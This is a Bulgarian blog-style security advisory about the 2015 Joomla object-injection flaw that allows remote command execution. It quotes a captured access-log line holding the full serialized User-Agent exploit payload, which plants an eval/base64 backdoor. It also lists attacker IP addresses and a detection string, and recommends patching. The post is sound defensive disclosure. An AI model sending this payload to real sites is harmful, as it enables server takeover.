Нова критична уязвимост в Joomla

Нова критична уязвимост в Joomla

От Joomla security team пуснаха нов ъпдейт, в който се прилага кръпка на критична уязвимост,  позволяваща изпълнението на remote команди. Уязвимостта се изпълнява лесно и засяга версиите от 1.5 до 3.4 и точно това е фактът, който я прави толкова опасна. Тя е открита и пачната два дни, след като експлойтът е бил вече в действие, а това от своя страна предполага, че засегнатите клиенти са немалък брой.

Какво представлява атаката?

Трети лица изпращат object injection чрез HTTP user agent, което води и до напълно отдалечен достъп за изпълнение на команди.

А ето и един пример:

212.21.66.6 – – [16/Dec/2015] „GET / HTTP/1.1“ 200 6643 „http://*******“ „}__test|O:21:\“JDatabaseDriverMysqli\“:3:{s:2:\“fc\“;O:17:\“JSimplepieFactory\“:0:{}s:21:\“\\0\\0\\0disconnectHandlers\“;a:1:{i:0;a:2:{i:0;O:9:\“SimplePie\“:5:{s:8:\“sanitize\“;O:20:\“JDatabaseDriverMysql\“:0:{}s:8:\“feed_url\“;s:60:\“eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\“;s:19:\“cache_name_function\“;s:6:\“assert\“;s:5:\“cache\“;b:1;s:11:\“cache_class\“;O:20:\“JDatabaseDriverMysql\“:0:{}}i:1;s:4:\“init\“;}}s:13:\“\\0\\0\\0connection\“;b:1;}\xf0\x9d\x8c\x86″

От проведените наблюдения над подобни атаки може да се заключи, че от 12 декември до днес те нарастват изключително бързо и все повече страници са сериозни афектирани.

Как да се предпазим?

Първо ви препоръчваме да прегледате вашите Access logs – чрез cPanel -> Raw Access log полетa. След като отворите нужния файл, може да потърсите заявки от следните адреси:

146.0.72.83
74.3.170.33
194.28.174.106

Проверете и заявки включващи:

JDatabaseDriverMysqli

Ако забележите подобна заявка, то е много вероятно страницата еи да е афектирана от атаката.

Силно ви препоръчваме възможно най-скоро да извършите update на системата. За потребителите на версия 3.х е необходимо да преминете до последната налична версия 3.4.6. Потребителите на 2.х и 1.х версията могат да използват следния адрес с решение:

https://docs.joomla.org/Security_hotfixes_for_Joomla_EOL_versions

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *